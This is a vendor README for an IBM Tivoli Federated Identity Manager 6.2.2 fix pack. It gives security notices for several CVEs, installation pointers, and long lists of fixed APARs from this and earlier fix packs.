IBM® Tivoli® Federated Identity Manager, Fix Pack 6.2.2-TIV-TFIM-FP0018 README

©Copyright International Business Machines Corporation 2008, 2017. All rights reserved. U.S. Government Users Restricted Rights -- Use, duplication or disclosure restricted by GSA ADP Schedule Contract with IBM Corp.

NOTE: Before using this information and the product it supports, read the general information under the Notices section of this document.

Date: Thursday, 19 April 2018

=====================================================================================================

Contents

  1. ABOUT THIS PATCH
  2. ADDITIONAL CERTIFICATION INFORMATION
  3. APARS AND DEFECTS FIXED
  4. BEFORE INSTALLING THIS PATCH
  5. INSTALLING THIS PATCH
  6. BEFORE UNINSTALLING THIS PATCH
  7. UNINSTALLING THIS PATCH
  8. DOCUMENTATION UPDATES
  9. SOFTWARE LIMITATIONS
  10. KNOWN ISSUES AND WORKAROUNDS
  11. NOTICES

=====================================================================================================

About the fix pack

This fix pack corrects problems in IBM Tivoli Federated Identity Manager (Federated Identity Manager) and IBM Tivoli Federated Identity Manager Business Gateway (Federated Identity Manager Business Gateway), Version 6.2.2. It requires that Federated Identity Manager or Federated Identity Manager Business Gateway, Version 6.2.2, be installed. After installing this fix pack, your Federated Identity Manager or Federated Identity Manager Business Gateway installation will be at level 6.2.2..


IMPORTANT NOTICE

Potential cross-site scripting vulnerability via macros in event page template files

Some IBM Tivoli Federated Identity Manager page macros might be vulnerable to cross site scripting attacks when their values are not properly encoded. Contact IBM Support for the list of macros that might be subjected to this issue. To remediate this, add the macros provided by IBM Support to the list of comma-separated tokens in the runtime custom property SPS.PageFactory.HtmlEscapedTokens. Add these macro so that their values are HTML-escaped in the template files. For example, if the list of macros provided is:

the value of the runtime custom property SPS.PageFactory.HtmlEscapedTokens with the above macros added can be:

@REQ_ADDR@,@DETAIL@,@EXCEPTION_STACK@,@EXCEPTION_MSG@,@RESPONSE@,@TARGET@,@DETAIL@,@SAMLSTATUS@,@EXAMPLE_MACRO1@,@EXAMPLE_MACRO2@,@EXAMPLE_MACRO3@

NOTE: Other macros that are prone to cross site scripting vulnerability can also be added to SPS.PageFactory.HtmlEscapedTokens. The value of this runtime custom property will be revised periodically and update as needed. For more information regarding the runtime custom property, see Custom properties for single sign-on protocol service.


Possible security exposure with IBM WebSphere Application Server with WS-Security enabled applications using LTPA tokens (CVE-2011-1377)

The security that the IBM WebSphere Application Server provides might be weaker than expected when using web services security (WS-Security). A user might randomly gain elevated privileges on the provider system. WS-Security might assign the identity of a previously processed LTPA token to a new inbound LTPA token after authentication. This impacts applications using either JAX-WS and JAX-RPC.

Versions affected:

The same fix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager. For more information regarding the vulnerability and the fix, access http://www.ibm.com/support/docview.wss?uid=swg21587536

Use the IBM WebSphere Update Installer (WUI) to apply the fix. If the WUI has not been previously installed, the WUI can be downloaded from http://www.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer, see the WebSphere Update Installer documentation.

Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server as soon as possible. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed fix installation instructions.


Denial of Service Security Exposure with Java JRE/JDK hanging when converting 2.2250738585072012e-308 number (CVE-2010-4476)

This security alert addresses a serious security issue: CVE-2010-4476 (Java Runtime Environment hangs when converting "2.2250738585072012e-308" to a binary floating-point number). This vulnerability might cause the Java Runtime Environment to hang, go into an infinite loop, and/or crash resulting in a denial of service exposure. The JRE might hang if the number is written without scientific notation (324 decimal places). In addition to the Application Server being exposed to this attack, any Java program using the Double.parseDouble method is also at risk of this exposure including any customer written application or third party written application.

The following products contain affected versions of the Java Runtime Environment:

The same iFix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager. For more information regarding the vulnerability and the iFix access http://www.ibm.com/support/docview.wss?uid=swg21462019

Use the IBM WebSphere Update Installer (WUI) to apply the fix. If the WUI has not been previously installed, the WUI can be downloaded from http://www.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer, see the WebSphere Update Installer documentation.

Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server as soon as possible. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed iFix installation instructions.


JAVA.LANG.RUNTIMEEXCEPTION: SRV.8.2: REQUESTWRAPPER OBJECTS MUST EXTEND SERVLETREQUESTWRAPPER OR HTTPSERVLETREQUESTWRAPPER (PM10357)

This APAR PM10357 is reported for WebSphere Application Server (WAS) v6.1. As a result of this APAR, operations in the IBM Tivoli Federated Identity Manager Management Console can fail with the following exception observed in the log if the Management Console is deployed on an affected version of WAS v6.1:

java.lang.RuntimeException: SRV.8.2: RequestWrapper objects must extend ServletRequestWrapper or HttpServletRequestWrapper

Examples of operations that can fail include:

Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed iFix installation instructions.

The same fix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager.

The IBM WebSphere Update Installer (WUI) must be used to apply the fix. If the WUI has not previously installed, download the WUI from http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer click here.


IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway can be affected by vulnerabilities in the Websphere IBM Java Runtime Environment (CVE-2013-2407)

A unspecified vulnerability in the Websphere IBM Java Runtime Environment (JRE) component allows remote attackers to affect the confidentiality and availability of Tivoli Federated Identity Manager (TFIM) and IBM Tivoli Federated Identity Manager Business Gateway TFIMBG) via unknown vectors related to Libraries.

The following products contain affected versions of the Java Runtime Environment:

The same iFix applies to the IBM WebSphere Application Server Standalone, Network Deployment and Embedded (eWAS) versions. It also applies to the eWAS version that is included with IBM Tivoli Federated Identity Manager. For more information regarding the vulnerability and the iFix access http://www-01.ibm.com/support/docview.wss?uid=swg21644157

Use the IBM WebSphere Update Installer (WUI) to apply the fix. If the WUI has not been previously installed, the WUI can be downloaded from http://www.ibm.com/support/docview.wss?rs=180&uid=swg24020448. For detailed instructions on how to install the IBM WebSphere Update Installer, see the WebSphere Update Installer documentation.

Apply the fix provided here to all Tivoli Federated Identity Manager environments that use the affected versions of IBM WebSphere Application Server as soon as possible. Select the fix that applies to your IBM WebSphere Application Server environment and reference the corresponding readme file for detailed iFix installation instructions.


Fix pack contents and distribution

This fix pack package contains:

This fix pack is distributed as an electronic download from the IBM Support Web site.


Architecture

This fix pack package supports the same operating system releases that are listed in the Operating systems for a specific product for the product Tivoli Federated Identity Manager and the version 6.2.2.

This fix pack package supports the same software prerequisites that are listed in the Prerequisites of a specific product for the product Tivoli Federated Identity Manager and the version 6.2.2.

The Tivoli Federated Identity Manager's risk-based access feature's software requirements are listed here. Since 6.2.2-TIV-TFIM-FP0004, the list of supported databases also includes:


Fix packs superseded by this fix pack

6.2.2-TIV-TFIM-FP0017

6.2.2-TIV-TFIM-FP0016

6.2.2-TIV-TFIM-FP0015

6.2.2-TIV-TFIM-FP0014

6.2.2-TIV-TFIM-IF0013

6.2.2-TIV-TFIM-FP0012

6.2.2-TIV-TFIM-IF0011

6.2.2-TIV-TFIM-FP0010

6.2.2-TIV-TFIM-FP0009

6.2.2-TIV-TFIM-FP0007

6.2.2-TIV-TFIM-FP0006

6.2.2-TIV-TFIM-LA0005

6.2.2-TIV-TFIM-FP0004

6.2.2-TIV-TFIM-FP0002


Fix pack structure

Federated Identity Manager consists of the following components that can be installed separately:

This fix pack applies only to the administration console, management service and runtime component, and Web Services Security Management (first three components listed above) and the Web plug-in (Internet information services, Apache/IBM HTTP Server Web plug-in) and risk-based access components. These components must be at the same level. For example, if you install a fix pack for the management service and runtime component, you must install the corresponding fix packs for the administration console and WSSM components. If all three components are not at the same fix pack level, they are not guaranteed to interoperate with each other as designed.


APARs and defects fixed

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0018

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV96485
SYMPTOM: TFIM 6.2.2.16 throwing classnotfound when using SSL to LDAP with alias service

IV97422
SYMPTOM: PAC Header is URL Encoded after applying FP17

IV92373
SYMPTOM: TFIM JDBC Alias look up error

IV98490
SYMPTOM: TFIM 6.2.2.17 SETS FIM COOKIE SECURE EVEN THOUGH ACCESS IS HTTP

IJ04891
SYMPTOM: TFIM is affected by a Security Assertion Markup Language (SAML)-based single sign-on (SSO) systems vulnerability<

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0017

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV60437
SYMPTOM: TFIM CONFIG IMPORT DOES NOT UPGRADE ALL FEDERATION AND PARTNERS CORRECTLY IN SOME CASES

IV78421
SYMPTOM: DELETING A CUSTOM MODULE INSTANCE SHOULD REMOVE ALL FEDERATION/PARTNER REFERENCES TO THE MODULE

IV79973
SYMPTOM: NEED PROVIDER ID BE NON-URL

IV80448
SYMPTOM: CTGDIS197E CONFIG INSTANCE WITH NAME 'TXXXXX' IS ALREADY RUNNING

IV81200
SYMPTOM: LDAP TIMEOUT PARAMETER DURING ALIAS LOOKUP

IV81201
SYMPTOM: IMPROVES PERFORMANCE OF BASIC LDAP USER SERVER SELECTION DURING ALIAS LOOKUP

IV82233
SYMPTOM: DELETE PARTNER MAPPING RULE DOES NOT CLEAR MAPPING RULE TYPE

IV81312
SYMPTOM: STSUUSER PRINCIPAL DOES NOT MATCH INCOMING ASSERTION PERSISTENT NAMEID

IV81424
SYMPTOM: NULL POINTER ERROR WHILE IMPORTING A PARTNER

IV82619
SYMPTOM: TFIM NOT FOLLOWING SAML SPEC WHEN AUTHN REQUEST SENT WITH FORCEAUTHN=TRUE

IV83053
SYMPTOM: SAML20.INCLUDEINCLUSIVENAMESPACES IN CUSTOM PROPERTIES IGNORED WHEN NOT ALL OUTGOING SAML MESSAGES AND ASSERTIONS SIGNED

IV83141
SYMPTOM: TFIM SIGNED SAML ASSERTIONS CAUSE DIGEST VALUE CALCULATION PROBLEMS

IV83602
SYMPTOM: FIM URL ENCODING HEADER VALUES IS CAUSING ISSUES FOR BACKEND APPLIACTIONS

IV84171
SYMPTOM: RELAY STATE IS SET TO NULL WHEN TARGET URL IS NULL

IV85111
SYMPTOM: SPACE IN FIM ATTRIBUTES ARE CONVERTED TO + CHARACTER

IV90210
SYMPTOM: PROBLEM WITH O365 AFTER APPLYING TFIM 6.2.2.16

IV90763
SYMPTOM: TFIM 6.2.2.16 JVMS MAY HANG WHEN SHUTTING DOWN SERVERS

IV91232
SYMPTOM: DISTRIBUTEDMAP CUSTOM RUNTIME PARAMETERS CAUSE DELAY DURING AUTHENTICATION

IV91644
SYMPTOM: CANNOT UPDATE USC PROFILE.HTML WITHOUT UPDATING SECRET QUESTIONS

IV91645
SYMPTOM: TFIM SESSION LIFETIME HAS A MAX OF 24.8 DAYS

IV93047
SYMPTOM: SET DEFAULT VALUE FOR SOAPACTION HEADER

IV95727
SYMPTOM: XML External Entity Injection Vulnerability

IV95729
SYMPTOM: Cross-site Scripting Vulnerability

IV95733
SYMPTOM: Missing Attribute in Encrypted Session Cookie

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0016

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV73515
SYMPTOM: THE RTSS CONNECTION FROM RBA ONLY ALLOWS HTTP TRAFFIC

IV74285
SYMPTOM: XML EXTERNAL ENTITY INJECTION VULNERABILITY

IV77590
SYMPTOM: THE RBA MAX_VALUE COLUMN DOES NOT ALLOW A VALUE MORE THAT 2 BILLION

IV77587
SYMPTOM: DEADLOCKS OCCUR IN THE RBA SESSION TABLES (See the documentation updates for APAR IV77587)

IV77588
SYMPTOM: PREVENT DEADLOCKS IN THE RBA SESSION TABLES (See the documentation updates for APAR IV77588)

IV77597
SYMPTOM: UPDATED PRE-INSTALLATION INSTRUCTIONS (See the documentation updates for APAR IV77597)

IV77558
SYMPTOM: TFIM 6.2.2 is vulnerable to cross-site scripting attack

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0015

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV74198
SYMPTOM: SECURITY UPDATE

IV72000
SYMPTOM: API DOCUMENTATION AVAILABLE FOR IDMAPPINGEXTUTILS

IV72559
SYMPTOM: INABILITY TO INSERT SUBJECT ELEMENT INTO SAML2 AUTHNREQUEST

IV63024
SYMPTOM: TAM CONF FILE AND KS NOT UPDATED IN DMGR CONFIG REPOSITORY WHEN API AUTO-REFRESHES

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0014

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV66435
SYMPTOM: UNDEFINED PAGE ERROR WHEN USING INVALID CHARS FOR USC SECRET QUESTION ANSWER

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0012

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV62299
SYMPTOM: UNDEFINED PAGE ERROR WHEN USING INVALID CHARS FOR USC SECRET QUESTION ANSWER

IV63149
SYMPTOM: STABILITY FIX FOR TFIM MANAGEMENT SERVICE

IV63877
SYMPTOM: PROVIDERID UPDATE TO A NON-URL VALUE LEADS TO CONFIG CORRUPTION

IV64327
SYMPTOM: TFIMCFG.JAR CANNOT HANDLE MORE THAN 1024 CHARS OF OUTPUT WITH WGACONFIG

IV64967
SYMPTOM: INCORRECT RISK SCORE BEING RETURNED BY RISK ENGINE

IV65893
SYMPTOM: DISTRIBUTED MAP DEFAULT RETRY LIMIT/DELAY NOT SET

IV65894
SYMPTOM: INCORRECT OPENID ID URL USED FOR CUSTOM ID GENERATOR

Problems fixed by interim fix 6.2.2-TIV-TFIM-IF0011

The following problems are corrected by this interim fix. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV64324
SYMPTOM: Improving the robustness of URL validation in OAuth2 workflow.

IV64325
SYMPTOM: Adding a new Custom Runtime Property named 'redirecturl.validation.enabled', which will be set to true for new FIM domain created, and will be false for existing FIM domain which were created before installing this Interim Fix or any future fix pack after this Interim Fix. When it's set to true, URL redirection in APAR IV64349, IV64376, IV64494 will be based the allowed URLs specified. IV64325)

IV64349
SYMPTOM: Specifying allowed URLs to SAML 1.1 and SAML 2.0 federation and partner level, based on which the SAML 1.1 and SAML 2.0 Service Provider SSO Profile can redirect to. The common domain cookie reading and writing service in the SAML 2.0 Identity Provider Discovery Profile is not included in this APAR, it's covered in previous APAR IV50637. (See the documentation updates for APAR IV64349)

IV64376
SYMPTOM: Specifying allowed URLs to federation level, based on which the OPENID SSO can redirect to. (See the documentation updates for APAR IV64376)

IV64494
SYMPTOM: Specifying URLs that the authentication service can redirect to. (See the documentation updates for APAR IV64494)

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0010

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV60999
SYMPTOM: TFIM AUDIT EVENTS DEPENDENT ON WEBSPHERE TRACING.

IV60745
SYMPTOM: INCORRECT ERROR MESSAGE IN RESPONSE TO MINIMUM NUMBER OF SECRET QUESTIONS.

IV60296
SYMPTOM: FIM OSGI BUNDLE HAS THREAD UNSAFE CLASSES.

IV60993
SYMPTOM: ALLOW CDATA IN MAPPING RULES.

IV60437
SYMPTOM: TFIM CONFIG IMPORT DOES NOT UPGRADE ALL FEDERATION AND PARTNERS CORRECTLY IN SOME CASES.

IV58675
SYMPTOM: ADDITIONAL AUDITING FOR OTP

IV58596
SYMPTOM: CUSTOM PROPERTY WSFED.IDP.RSTR.EXCLUDED.ELEMENTS ONLY WORKS WHEN TRACING IS ENABLED.

IV59510
SYMPTOM: AFTER RBA DEPLOY ERROR "AN ERROR OCCURRED WHILE EVALUATING THE 'CONDITION' OF AN XACML POLICY 'RULE' ELEMENT." MAY BE SEEN.

IV55405
SYMPTOM: ADDING INSTRUCTIONS TO SET CS ISOLATION LEVEL WITHIN THE RBA DATABASE CONFIGURATION. (See the documentation updates for APAR IV55405)

IV60252
SYMPTOM: ATTRIBUTE QUERY REQUEST IS ALWAYS VALIDATED WHEN TFIM IS AN IDP

IV59071
SYMPTOM: CAN NOT CORRECTLY CONFIGURE ATTRIBUTE QUERY

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0009

The following problems are corrected by this fix pack. For more information about the APARs listed here, see the Tivoli Federated Identity Manager support site.

IV52630
SYMPTOM: Uncleared access token with failed OAuth 2.0 Resource Owner Password Credentials Flow. (See the documentation updates for APAR IV52630)

IV52562
SYMPTOM: Trying to import an authentication policy javascript mapping rule to a point of contact configured "like WebSEAL" resulted in this exception in the console's log: Caused by: java.lang.NoClassDefFoundError: com.tivoli.am.fim.user.info.UserInfoProviderException

IV52617
SYMPTOM: DB2 schema creation script should prompt for password. (See the documentation updates for APAR IV52617)

IV52545
SYMPTOM: ID Mapping Utils does not provide a function to deprovision TOTP/HOTP shared secrets.

IV52618
SYMPTOM: RBA_DB has table with name KEYS which is a reserved keyword in MySQL.

IV52546
SYMPTOM: When there are more than 1 user running the RBA flow, the info.js will cause an error.

IV52624
SYMPTOM: Improve one-time enforcement of OTP.

IV52539
SYMPTOM: RTSS will return a failure when it could be returning a PERMIT.

IV52616
SYMPTOM: Upgrade to Fixpack 6 or 7 from 6.2.2 to below FP 4 will fail with NullPointerException.

IV52613
SYMPTOM: CLI command manageItfimOneTimePassword with operation configure throws the following exception: com.ibm.ws.scripting.ScriptingException: java.lang.NoClassDefFoundError: java.lang.NoClassDefFoundError: com.tivoli.am.fim.user.info.UserInfoProviderException

IV52612
SYMPTOM: TFIM UserInfoProvider database is using MySQL reserved keyword as table name.

IV50637
SYMPTOM: Specifying URLs that the common domain cookie reading and writing service in the SAML 2.0 Identity Provider Discovery Profile can redirect to. (See the documentation updates for APAR IV50637)

IV50521
SYMPTOM: When info.js is loaded more than once, the cookie ac.uuid will be changed to invalid value. It will have <SCRIPT>...</SCRIPT> in the content.

IV50087
SYMPTOM: When a trigger URL parameter is added as an attribute to an assertion within a mapping rule and the value of this parameter is a complex xml type, the value of the attribute is the parameter value that has been XML-escaped twice.

IV47214
SYMPTOM: Macro %SSOREQUEST% does not contains the exact incoming request as samlp:Extensions is removed from the request.

IV52562
SYMPTOM: Publish plugins fails in a cluster with the following exception observed in the trace log: com.tivoli.am.fim.mgmt.web.OSGiManagementImpl restart com.tivoli.am.fim.osgi.EclipseControllerException: Caught exception while trying to get this WebSphere Application Server's internal class acess mode.

IV47042
SYMPTOM: TFIM is failing to recognize a nested status code when the status code contains whitespace.

IV46807
SYMPTOM: In a SAML 2.0 federation where there are multiple SPs and user is logged into more than 1 SP, SP-initiated SLO using asynchronous binding e.g. HTTPPost fails.

IV45886
SYMPTOM: LDAP Migration Tool throws out of memory and Java networking exceptions when there are a million aliases to be migrated.

IV43834
SYMPTOM: USC displays a success page even though password change fails for forgotten password flow.

IV52563
SYMPTOM: When an alias with no certificate is present in the keystore, listing of keys fails.

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0007

IV44424
SYMPTOM: Example USC mapping rule does not validate mobile number, email, secret question answer and secret question index.

IV44425
SYMPTOM: If Redirect URI is not contained in the request to the OAuth 2.0 authorize endpoint, the default redirect URI should be read from OAUTH20.ClientRedirectUri value.

IV44426
SYMPTOM: The login button in the OTP login page should be disabled once the retry limit has been reached so that the user cannot attempt another retry which will cause exception FBTOTP313E.

IV44484
SYMPTOM: Wrong X509SKI value in digital signature.

IV44470
SYMPTOM: Unnecessary dependency on PDJRTE when configuring Web Gateway Appliance as point of contact with the tfimcfg tool.

IV44403
SYMPTOM: Attributes with colons in their names may not be specified in an XACML rules policy.

IV44405
SYMPTOM: If the policy_consent_based_registration policy is used and the user logs in on a registered device, they will be asked for consent to register again.

IV44410
SYMPTOM: If the path to a resource is different from the path to info.js, then the cookie containing the session id will not be sent when the resource is accessed. The cookie will also not be secure when using HTTPS.

IV44411
SYMPTOM: Javascript matchers based on historical user data can not be written because the historical data is not passed to the matcher.

IV44412
SYMPTOM: When RBA risk reports are enabled, traces are seen in the System.out logs.

IV43149
SYMPTOM: Risk-based access Federation First Steps Wizard does not work properly after applying TFIM 6.2.2 Fixpack 6. The panel after the panel to scan TFIM configurations is blank. After clicking next, the wizard prompts an error message.

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0006

IV37665
SYMPTOM: For modern browsers, the table rows in FIM console are misaligned.

IV37666
SYMPTOM: When using the JRE of WAS 8 and above to run tfimcfg.jar to configure a WebSEAL server, the operation fails with the following exception: FBTTAC003E An error occurred when reading or writing the file /opt/IBM/WebSphere/AppServer/java/jre/PolicyDirector/PD.properties: java.io.FileNotFoundException: /opt/IBM/WebSphere/AppServer/java/jre/PolicyDirector/PD.properties (No such file or directory)

IV37668
SYMPTOM: When creating new point of contact using CLI, the authentication policy callbacks are incorrectly configured using the configuration of the authenticate callbacks.

IV37674
SYMPTOM: When using FFS to configure Salesforce as a SaaS, the Summary page shows: When configuring the service provider settings, you may need to supply the Federated Identity Manager Endpoint URL which is ....

IV37305
SYMPTOM: When USC forgot password flow is triggered, and the user input new password that does not meet password requirements, the secret question page is redisplayed with all secret question fields set to the first question and disabled. When user fills in the answer to all secret question answer fields and resubmit, another error will be shown.

IV37675
SYMPTOM: When user runs through the USC forgotten password flow and too many failed attempts at answering secret question and answer are made, the error page is displayed using forgotid_error.html instead of forgotpassword_error.html

IV37680
SYMPTOM: WAS JRE is not configured for TAM runtime for Java if FFS is used to create domain, deploy and configure runtime.

IV36139
SYMPTOM: On OAuth 1.0 flow, when Temporary Credential Request Endpoint contains query string, Request Temp Token fail with signature mismatch.

IV37707
SYMPTOM: Cannot configure FIM to use POST only in OpenID flows.

IV38333
SYMPTOM: FFS wizards complete successfully even when there are problems configuring the junctions using tfimcfg.jar.

Problems fixed by fix pack 6.2.2-TIV-TFIM-LA0005

IV36145
SYMPTOM: OTP support fixes that include outbound HTTP proxy support, OTP retry enforcement, resending of OTP, success/failure determination of SMS delivery via HTTP response body, detailed tracing for OTP SMS Provider, updates to OTP delivery and provider modules, OTP authentication policy callback mapping rule console fix and un-authenticated OTP support. (See the documentation updates for APAR IV36145)

IV36140
SYMPTOM: User Self Care session information storage. (See the documentation updates for APAR IV36140)

IV36136
SYMPTOM: Some USC module configuration is not read from config and uses the default value(s) only. One example is the 'USC.AccountRecoveryValidationAttributes' configuration.

IV36153
SYMPTOM: Null pointer exception in STSLTPATokenModule when Principal name attribute type is null.

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0004

IV31640
SYMPTOM: The RelayState query string parameter provided to the IP-initiated SSO initial URL is used to populate the RelayState macro in the authentication response when the target query string parameter is empty or not provided. It should be ignored.

IV26049
SYMPTOM: The SAML 1.1 STS Token Module fails to populate the STSUU's Principal correctly when the inbound SAML Assertion contains an AuthenticationStatement with a type attribute that is set to something other than "saml:AuthenticationStatement".

IV31657
SYMPTOM: A blank page is shown during FSSO.

IV31658
SYMPTOM: Corrupted URLs in the feds.xml and sps.xml when a non-sps URL is provided for Single Sign-On Service, Single Logout Service, Soap Endpoint, Artifact Resolution Service, Assertion Consumer Service or Name ID Management Service URLs in the SAML 2.0 IP/SP Federation properties page via Management Console.

IV31660
SYMPTOM: Some Service Providers for the WS-Federation Passive Profile do not accept RequestSecurityTokenResponse that contain certain elements. For example, Sharepoint does not accept RequestSecurityTokenResponse that contains the elements wst:Forwardable, wst:Delegatable, wst:Status and wst:Renewing. However, these elements are present in the RequestSecurityTokenResponse generated by the TFIM Identity Provider for the WS-Federation Passive Profile. (See the documentation updates for APAR IV31660)

IV31661
SYMPTOM: The default value of the attribute that the alias service uses to denote the user identifier is "uid". The LDAP Migration Tool supports only the default value and does not work for any value other than the default value. (See the documentation updates for APAR IV31661)

IV31641
SYMPTOM: SubjectConfirmationData is missing when generating a SAML 2.0 assertion with Bearer subject confirmation method and no claims is supplied in the RST.

IV27198
SYMPTOM: Missing ds in InclusiveNamespace Prefix for SAML 2.0 Assertion Signature element.

IV21668
SYMPTOM: FIM doesn't provide 2048 bit option as key size when generating certificate request or self-signed certificate through console.

IV33064
SYMPTOM: When using the manageItfimStsChainMapping CLI command to create a response file, the values of AppliesTo service name and namespace are provided in the wrong attributes appliesToPortTypeName and appliesToPortTypeNamespace.

IV32867
SYMPTOM: NULLPointerException is thrown during initial loading of configurations after starting WebSphere.

IV32874
SYMPTOM: Latitude and accuracy affect risk score in location-based matching.

IV32875
SYMPTOM: Running the CLI command manageRbaPolicy with the "update" or "create" operation generates an additional wrong message on the prompt.

IV32904
SYMPTOM: DocumentNotFound exception is thrown for "itfim/rba/rba.properties" when running the CLI command manageRbaConfiguration with the "deploy" operation.

IV32936
SYMPTOM: Device Registration Audit event shows that it is successful even though the device is not getting registered.

IV32937
SYMPTOM: Example matcher file "language.js" returns boolean instead of Enum.

Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0002

IV23423
SYMPTOM: Improve SAML signature conformance.

IV23435
SYMPTOM: Improve signature conformance.

IV23451
SYMPTOM: Improve OpenID signature conformance.

IV21908
SYMPTOM: TFIM invalidates the AuthnRequest message when the Assertion Consumer Service URL doesn't exactly match the configured URL. (See the documentation updates for APAR IV21908)

IV21963
SYMPTOM: The STSUUSER principal does not match the incoming subject name id of the assertion. (See the documentation updates for APAR IV21963)

IV21960
SYMPTOM: The 'Federate this account link' is incorrectly generated as null?RelayState= in the ivtapp's federations.jsp page of the identity provider.

IV19945
SYMPTOM: The TFIM USC feature generates a validation email message that contains a link to complete the enrollment flow. That link is passed as a macro to the email template when generating the email. If the customizer wants to modify the flow by modifying the link location it needs to edit the email template file to point somewhere else but it needs to add the nonce to the query string of such link. With the current macros is difficult to achieve this because the nonce is not provided as a separate macro.(See the documentation updates for APAR IV19945.)

IV17419
SYMPTOM: The TFIM SPS is missing required HTTP methods for certain protocols to work. For example, REST protocols need at a minimum GET, POST, PUT, and DELETE. This defect will correct this issue but also ensure if previous delegates are called using previously unsupported methods the returned status code of 405 will be the same just like before the changes.

IV19827
SYMPTOM: The TFIM Single Sign On protocol service (SPS) SAML 2.0 protocol implementation allows a customer to use the 'urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified' name identifier for single sign on. By default TFIM will treat a 'urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified' name identifier as 'urn:oasis:names:tc:SAML:2.0:nameidformat:persistent' name identifier unless the default name identifier is set to another type like emailAddress. The Single Logout operation incorrectly queries the alias service if unspecified name identifier is used and the default name identifier is set to email.(See the documentation updates for APAR IV19827.)

IV19593
SYMPTOM: Unable to initialize CARS audit event handler plugin when the CARS webservice URL is an HTTPS endpoint.

IV19846
SYMPTOM: In the IBM Tivoli Federated Identity Manager Web Service Security Management Configuration Guide, a method is provided on how to associate the shared library with a server. This method cannot be used if FSSO is configured in the same WebSphere Application Server. A new method that associates the shared library with the web service provider or requester is documented. This new method does not have the same limitation. (See the documentation updates for APAR IV19846.)

IV19850
SYMPTOM: A command cited in the installation documentation contains a typographical error. (See the documentation updates for APAR IV19850.)

IV16979
SYMPTOM: The BASE64 encoded token generated by the IVCred STS module is split into multiple lines. This is not desirable in some cases. (See the documentation updates for APAR IV16979.)

IV18104
SYMPTOM: No error message is reported when importing SAML 2.0 IDP or SP whose metadata contains Organization element with no OrganizationURL element.

IV16948
SYMPTOM: SLO fails when two SPs are authenticated using the same session index and both SP federations are on the same TFIM domain.

IV18112
SYMPTOM: The STS obtains the base security token for execution from either the base element on the RequestSecurityToken message or from the WS-Security tokens included on the soap headers. Tivoli Federated Identity Manager will take the first WS-Security token found on the soap header. After this modification the SAML STS modules will look for the appropriate token type included on the WS-Security headers when the change is enabled. (See the documentation updates for APAR IV18112.)

IV16977
SYMPTOM: Certain point of contacts that use external authentication interface do not recognize the identity of the user that is set by Tivoli Federated Identity Manager in the response HTTP header (typically, "am-fim-eai-user-id"), since these point of contacts are not aware that the TFIM URL encodes this identity. In such cases, TFIM should not URL encode this identity.

IV16994
SYMPTOM: Requests to Tivoli Federated Identity Manager's WSTrust 1.3 endpoint URL using the ?WSDL parameter to get the WSDL document results in subsequent SOAP services to fail.

IV17595
SYMPTOM: NullPointerException is thrown when sending SAML 2.0 messages (e.g., Logout Request) with invalid IssueInstant attribute.

IV17871
SYMPTOM: The Tivoli Federated Identity Manager STS does not support the RequestType and KeyType elements on the RequestSecurityTokenResponse message. The RequestType value should be set to the value received on the request and the KeyType should be set on one of the values supported by WS-Trust based on an attribute in the STS universal structure.(See the documentation updates for APAR IV17871.)

IV17875
SYMPTOM: Tivoli Federated Identity Manager is incorrectly processing SAML aliases with certain directory servers.

IV17870
SYMPTOM: Unable to customize the error page for error FBTSPS061E as there is no event mapping associated with this event.

IV17609
SYMPTOM:
  1. When creating an identity provider federation, the OAuth 1.0 and OAuth 2.0 options are erroneously displayed.
  2. OAuth 1.0 and OAuth 2.0 federations do not provide identity information to the STS for use in mapping rules.
  3. Macro replacement is not available on OAuth 1.0 or OAuth 2.0 pages.
  4. POST is not supported at OAuth authorize endpoints.
  5. Tivoli Access Manager config utility (tfimcfg.jar) does not set '-b ignore' flag for OAuth 2.0 federations.
  6. Updating OAuth 2.0 endpoints in the federations configuration panel can lead to UndeterminableProtocolException at runtime.
